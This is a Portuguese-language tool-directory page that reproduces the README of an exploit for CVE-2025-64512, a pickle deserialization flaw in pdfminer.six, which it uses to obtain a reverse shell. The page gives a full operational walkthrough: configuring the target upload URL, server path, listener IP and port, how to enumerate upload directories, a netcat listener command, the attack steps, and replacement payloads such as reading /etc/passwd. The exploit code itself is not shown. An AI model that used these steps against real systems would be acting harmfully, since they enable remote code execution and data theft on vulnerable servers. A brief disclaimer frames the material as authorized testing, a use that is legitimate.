Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-64512 — Exploit para CVE-2025-64512 para obter um shell reverso. | Kitploit
Ferramentas/GitHubGitHub/stoic-crawler/cve-2025-64512
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubstoic-crawler/cve-2025-64512

CVE-2025-64512

Exploit para CVE-2025-64512 para obter um shell reverso.

Ver Repositório
1há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-64512 – PoC de Desserialização do pdfminer.six

Visão Geral

Esta prova de conceito demonstra uma vulnerabilidade no pdfminer.six (CVE-2025-64512) que pode levar à execução arbitrária de comandos quando um PDF malicioso é processado. O exploit utiliza um PDF manipulado que referencia um pickle Python malicioso comprimido com gzip. Quando a aplicação vulnerável analisa o PDF, ela carrega o pickle e executa o payload embutido.

O PoC incluído está configurado para executar uma reverse shell em Python, mas o payload pode ser substituído por qualquer comando.


Requisitos

  • Python 3
  • requests

Instale a dependência necessária:

root@kitploit:~
pip install requests

Configuração

Antes de executar o exploit, edite a seção de configuração do exploit.py:

root@kitploit:~
BASE_URL = ""
UPLOAD_DIR = ""
LHOST = ""
LPORT = 4444

BASE_URL

A URL do endpoint de upload vulnerável.

Exemplo:

root@kitploit:~
BASE_URL = "http://target/upload.php"

O exploit faz upload tanto do PDF malicioso quanto do pickle comprimido para este endpoint.


UPLOAD_DIR

O diretório absoluto no alvo onde os arquivos enviados são armazenados.

Exemplo:

root@kitploit:~
UPLOAD_DIR = "/var/www/html/uploads"

Este caminho está embutido dentro do PDF gerado e deve corresponder ao local de onde a aplicação vulnerável irá posteriormente ler o pickle enviado.

Se o diretório de upload for desconhecido, determine-o durante a enumeração. Dependendo da aplicação, técnicas úteis incluem:

  • Revisar o código-fonte da aplicação (se disponível)
  • Inspecionar mensagens de erro ou stack traces
  • Procurar por arquivos de configuração
  • Identificar de onde os arquivos enviados são servidos
  • Enumerar locais de upload previsíveis
  • Fuzzing de caminhos de upload prováveis quando apropriado

Locais típicos incluem:

root@kitploit:~
/var/www/html/uploads
/var/www/uploads
/srv/www/uploads
/opt/application/uploads

O diretório correto depende inteiramente da aplicação alvo.


LHOST

Seu endereço IP do listener.

Exemplo:

root@kitploit:~
LHOST = "10.10.14.5"

LPORT

Porta de escuta para a reverse shell.

Exemplo:

root@kitploit:~
LPORT = 4444

Inicie um listener antes de executar o exploit:

root@kitploit:~
nc -lvnp 4444

Uso

Execute o exploit:

root@kitploit:~
python3 exploit.py

O script irá:

  1. Gerar um pickle malicioso.
  2. Comprimi-lo em evil.pickle.gz.
  3. Gerar um PDF malicioso referenciando esse pickle.
  4. Enviar ambos os arquivos.
  5. Disparar o processamento do PDF.
  6. Executar o payload se o alvo estiver vulnerável.

Payloads Personalizados

Em vez de uma reverse shell, qualquer comando do sistema operacional pode ser executado modificando o comando passado para:

root@kitploit:~
create_pickle_with_cmd(command)

Exemplos incluem:

root@kitploit:~
id
whoami
uname -a
cat /etc/passwd

Notas

  • A aplicação vulnerável deve processar o PDF enviado usando uma versão vulnerável do pdfminer.six.
  • O pickle enviado deve permanecer acessível no caminho referenciado no PDF manipulado.
  • A exploração bem-sucedida depende do fluxo de processamento do alvo e da estrutura de armazenamento de arquivos.

Aviso Legal

Esta prova de conceito é fornecida exclusivamente para fins educacionais, pesquisa de segurança e testes de penetração autorizados. Utilize-a apenas contra sistemas para os quais você tenha permissão explícita para realizar testes de segurança.

Baixar ferramenta